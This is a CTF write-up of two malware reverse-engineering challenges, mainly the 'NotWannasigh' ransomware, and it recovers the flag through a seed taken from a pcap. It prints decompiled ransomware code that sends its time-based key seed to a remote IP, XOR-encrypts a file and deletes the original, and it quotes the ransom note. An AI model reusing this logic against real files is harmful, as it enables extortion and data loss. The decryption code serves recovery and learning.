This contest had only two RE challenges, both of them malware. Not hard, but quite interesting.
danger-Live-and-Malicious-Code
The flag is hidden inside the virus's code. I don't know JS syntax that well, but I noticed a lot of string-handling functions, so I simply console.log'ed all of them. The URL that got printed had the flag sandwiched in the middle.
```text
WPI{Oh_nose_procoding_detected}
```
NotWannasigh
First, look at the ransom note:
```text
Haha! Your precious file flag.gif has been encrypted by my new and improved ransomware NotWannasigh! You must send bitcoin to "bitpay.com/83768" to get the decryption key. You should act fast because in 48 hours I will delete the key. Muahahahaha!
- def-not -h4ckah
(Hi, CTF challenge creator here. You should _NEVER_ pay the ransom. If you send bitcoin to that BTC wallet then you will ONLY be donating to charity (and hey, that's really nice of you, Mental Health Hackers is a great organization). I will NOT send you the decryption key)
```
The file flag-gif.EnCiPhErEd provided with the challenge should be the encrypted file, so decrypting it gives the flag. I didn't yet know what the provided pcap was for, so I looked at the program's implementation first.
```c
*(_QWORD *)seed = time(0LL);
srand(seed[0]);
fd = socket(2, 1, 0);
if ( fd == -1 )
{
  puts("could not create socket");
}
else
{
  puts("created socket");
  *(_DWORD *)&addr.sa_data[2] = inet_addr("108.61.127.136");
  addr.sa_family = 2;
  *(_WORD *)addr.sa_data = htons(0x50u);
  if ( connect(fd, &addr, 0x10u) >= 0 )
  {
    puts("connected");
    sprintf(&s, "%d", *(_QWORD *)seed);
    if ( send(fd, &s, 0xAuLL, 0) >= 0 )
      puts("sent");
    else
      puts("send failed");
  }
  else
  {
    puts("connect error");
  }
}
```
It first derives a random seed from the current time, then opens a connection and sends that seed to an IP address. The seed is obviously what the later random-number generation depends on, so it matters, and that is what the pcap is for: from the captured traffic we can recover the seed value, 1585599106.
Next it generates a sequence of random numbers:
```c
puts("targetting flag.gif");
stream = fopen("flag.gif", "r+");
fseek(stream, 0LL, 2);
v19 = ftell(stream);
fseek(stream, 0LL, 0);
printf("fileSize = %d\n", (unsigned int)v19);
v18 = v19 - 1LL;
v8 = v19;
v9 = 0LL;
v3 = alloca(16 * ((v19 + 15LL) / 0x10uLL));
v17 = &v6;
for ( i = 0; i < v19; ++i )
  *((_BYTE *)v17 + i) = rand();
puts("key generated by 256");
```
That produces the key (one byte of rand() output per byte of the file). The encryption itself follows:
```c
for ( j = 0; ; ++j )
{
  v14 = fgetc(stream);
  if ( j >= v19 )
    break;
  *((_BYTE *)v15 + j) = v14 ^ *((_BYTE *)v17 + j);
}
fclose(stream);
remove("flag.gif");
v13 = fopen("flag-gif.EnCiPhErEd", "w+");
for ( k = 0; k < v19; ++k )
  fputc(*((unsigned __int8 *)v15 + k), v13);
fclose(v13);
```
It is a plain XOR with the key stream, written out to a new file. So all we need to do is regenerate the same random sequence from the recovered seed and XOR it back over the ciphertext:
```cpp
#include <cstdio>
#include <cstdlib>

int main()
{
    // Seed recovered from the pcap: the value the malware sent to its server.
    srand(1585599106);
    FILE *s = fopen("../flag-gif.EnCiPhErEd", "rb");
    FILE *f = fopen("../flag.gif", "wb");
    if (!s || !f) {
        perror("fopen");
        return 1;
    }
    int c;
    // Check for EOF on the read itself: testing feof() before fgetc() would
    // process one extra byte after the end of the file.
    while ((c = fgetc(s)) != EOF) {
        // The malware stored rand() into a byte, so only the low 8 bits matter.
        int key = rand() & 0xff;
        fputc((c ^ key) & 0xff, f);
    }
    fclose(s);
    fclose(f);
    return 0;
}
```
This script has to be run on Linux, because rand() on Windows produces a different sequence from the one the malware (built against glibc) used.
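Since the Linux-only restriction comes from rand() itself, here is an added example (not the author's script) that reimplements glibc's srand()/rand() in C so the same keystream can be regenerated on any platform, and XORs it over a buffer exactly as the malware does. The sample buffer and the round-trip helper are constructed for this example; the seed 1585599106 is the one recovered from the pcap above.

```c
#include <stdint.h>
#include <string.h>

/* glibc rand() state: ring of 34 words (TYPE_3 additive feedback generator). */
typedef struct { uint32_t r[34]; int i; } glibc_rand_t;
/* r[i] = r[i-31] + r[i-3] (mod 2^32); the output is the new word >> 1. */
static uint32_t glibc_rand(glibc_rand_t *g)
{
    int i = g->i;
    uint32_t v = g->r[(i + 3) % 34] + g->r[(i + 31) % 34];
    g->r[i] = v;
    g->i = (i + 1) % 34;
    return v >> 1;
}

/* Reproduces glibc srand(): LCG-seed 31 words, copy 3, then discard 310 outputs. */
static void glibc_srand(glibc_rand_t *g, uint32_t seed)
{
    if (seed == 0) seed = 1;                  /* glibc treats seed 0 as 1 */
    g->r[0] = seed;
    for (int k = 1; k < 31; k++) {
        int64_t v = (16807LL * (int32_t)g->r[k - 1]) % 2147483647LL;
        if (v < 0) v += 2147483647LL;
        g->r[k] = (uint32_t)v;
    }
    for (int k = 31; k < 34; k++) g->r[k] = g->r[k - 31];
    g->i = 0;                                 /* next absolute index is 34 */
    for (int k = 0; k < 310; k++) (void)glibc_rand(g);
}

/* XOR the buffer with the byte-truncated rand() stream like the malware; XOR is its own inverse. */
static void xor_with_keystream(uint8_t *buf, size_t n, uint32_t seed)
{
    glibc_rand_t g;
    glibc_srand(&g, seed);
    for (size_t k = 0; k < n; k++)
        buf[k] ^= (uint8_t)glibc_rand(&g);
}

/* Round trip on a constructed sample (not the real flag.gif) with the pcap seed. */
static int round_trip_ok(void)
{
    uint8_t plain[] = "GIF89a constructed sample";
    uint8_t work[sizeof plain];
    memcpy(work, plain, sizeof plain);
    xor_with_keystream(work, sizeof plain, 1585599106u);
    int changed = memcmp(work, plain, sizeof plain) != 0;
    xor_with_keystream(work, sizeof plain, 1585599106u);
    return changed && memcmp(work, plain, sizeof plain) == 0;
}
```

With seed 1 the generator yields glibc's well-known first outputs 1804289383, 846930886, 1681692777, which is a quick way to confirm the reimplementation before pointing it at the real ciphertext.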
That recovers the gif containing the flag.
The flag is a bit hard to read; I misread one character the first time.
```text
WPI{It_always_feels_a_little _weird_writing_malware}
```